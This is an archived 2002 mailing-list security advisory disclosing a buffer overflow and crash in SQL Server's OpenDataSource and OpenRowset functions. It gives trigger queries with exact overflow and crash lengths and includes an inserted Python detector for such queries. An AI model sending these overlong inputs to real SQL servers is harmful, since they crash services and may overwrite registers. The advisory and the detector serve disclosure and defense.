Vulnerability Development mailing list archives

MSDE, Sql Server 7 & 2000 Adhoc Heterogenous Queries Buffer Overflow and DOS.


From: c c <cesarc56 () yahoo com>
Date: Tue, 19 Feb 2002 07:55:06 -0800 (PST)

                                Security Advisory

Name:              MSDE, Sql Server 7 & 2000 Adhoc Heterogeneous Queries Buffer Overflow and DOS.
System Affected:   MSDE, Sql Server 7, Sql Server 2000 with all service packs and fixes applied.
Severity:          High
Author:            Cesar Cerrudo.
Date:              19th February 2002
Advisory Number:   CC020201


Description:

Distributed queries access data from multiple heterogeneous data
sources, which can be stored on either the same or different
computers. Microsoft SQL Server supports distributed queries by using
OLE DB, the Microsoft specification of an application programming
interface (API) for universal data access. Distributed queries
provide SQL Server users with access to:
-Distributed data stored in multiple computers that are running SQL
Server.
-Heterogeneous data stored in various relational and non-relational
data sources that can be accessed using an OLE DB provider.

You can reference heterogeneous OLE DB data sources in Transact-SQL
statements by:
-Linked servers, OpenQuery function.
-OpenDataSource and OpenRowset functions.

The OpenDataSource and OpenRowset functions are accessible to all
users and contain an unchecked buffer in one of their parameters. The
buffer overflow and DOS problem occurs when an overly long string is
supplied in the "provider name" parameter.

Details:

In Sql Server 7 the overflow starts at character number 6819, and if
the number of characters is >= 6918 the server will crash:

SELECT *
FROM OpenDataSource(
'XXXXXXXXXXX...' ---> 6819 characters or more
,'')...nothing

SELECT * FROM OPENROWSET(
'XXXXXXXXXXX...' ---> 6819 characters or more
,'',
'')

In Sql Server 2000 the overflow starts at character number 6887, and
if the number of characters is >= 6998 the server will crash:

SELECT *
FROM OpenDataSource(
'XXXXXXXXXXX...' ---> 6887 characters or more
,'')...nothing

SELECT * FROM OPENROWSET(
'XXXXXXXXXXX...' ---> 6887 characters or more
,'',
'')

Depending on the number of characters, some register values are
overwritten. Try these examples and then take a look at the dump
file.
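As an added detection example (not part of the advisory), the following Python scans captured T-SQL statements, for instance the text of a SQL Profiler trace, and flags OPENDATASOURCE/OPENROWSET calls whose first string argument reaches the overflow lengths reported above. The sample statements are constructed for the demonstration.

```python
import re

# Overflow thresholds for the "provider name" argument as reported in the
# advisory: SQL Server 7 from 6819 characters, SQL Server 2000 from 6887.
# Alert on anything at or above the lower bound.
OVERFLOW_THRESHOLDS = {"sqlserver7": 6819, "sqlserver2000": 6887}
ALERT_LENGTH = min(OVERFLOW_THRESHOLDS.values())

# Matches OPENDATASOURCE( or OPENROWSET( followed by its first string
# literal. T-SQL escapes a quote inside a literal by doubling it, so the
# literal body is matched as ([^']|'')*.
_CALL_RE = re.compile(
    r"\b(OPENDATASOURCE|OPENROWSET)\s*\(\s*N?'((?:[^']|'')*)'",
    re.IGNORECASE | re.DOTALL,
)


def provider_name_lengths(sql: str):
    """Return (function, provider_name_length) for each ad hoc query call."""
    results = []
    for m in _CALL_RE.finditer(sql):
        literal = m.group(2).replace("''", "'")  # un-escape doubled quotes
        results.append((m.group(1).upper(), len(literal)))
    return results


def is_suspicious(sql: str, threshold: int = ALERT_LENGTH) -> bool:
    """True if any provider-name argument reaches the overflow length."""
    return any(n >= threshold for _, n in provider_name_lengths(sql))


def scan_trace(statements):
    """Return indices of captured statements that look like the crash trigger."""
    return [i for i, stmt in enumerate(statements) if is_suspicious(stmt)]


# Constructed sample trace: a benign call, a benign call containing an
# escaped quote, and one shaped like the advisory's crash trigger.
SAMPLE_TRACE = [
    "SELECT * FROM OPENROWSET('SQLOLEDB', 'server=s1;uid=u;pwd=p', 'SELECT 1')",
    "select * from opendatasource('It''s a provider', '')...tbl",
    "SELECT * FROM OpenDataSource('" + "X" * 7000 + "', '')...nothing",
]

if __name__ == "__main__":
    for i in scan_trace(SAMPLE_TRACE):
        print(f"statement {i}: {provider_name_lengths(SAMPLE_TRACE[i])}")
```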

Patch Available: 
NONE

Workaround:
Shut down the servers.

Vendor Status:
Microsoft was contacted. When I contacted them I explicitly told them
that I would apply RFPolicy v2. They asked me for the details and I
gave them to them, and then they told me that they would contact me
again.
The first time they walked on the edge of the policy and on the 5th
day they contacted me again. Now I haven't been contacted by them in
the last 8 days, so I am disclosing the information. Maybe this is a
new Microsoft policy, to not contact the researcher in the proper
time and not spend time writing a three-word mail.
One more thing: Microsoft doesn't digitally sign the mails from the
Security Response Center when they contact you; I think this is a
vulnerability.

I discovered another 3 or 4 security holes in SQL Server with diverse
severity; I will release them soon.

Don't blame me for this please, blame MICROSOFT!!!!!!!!!.


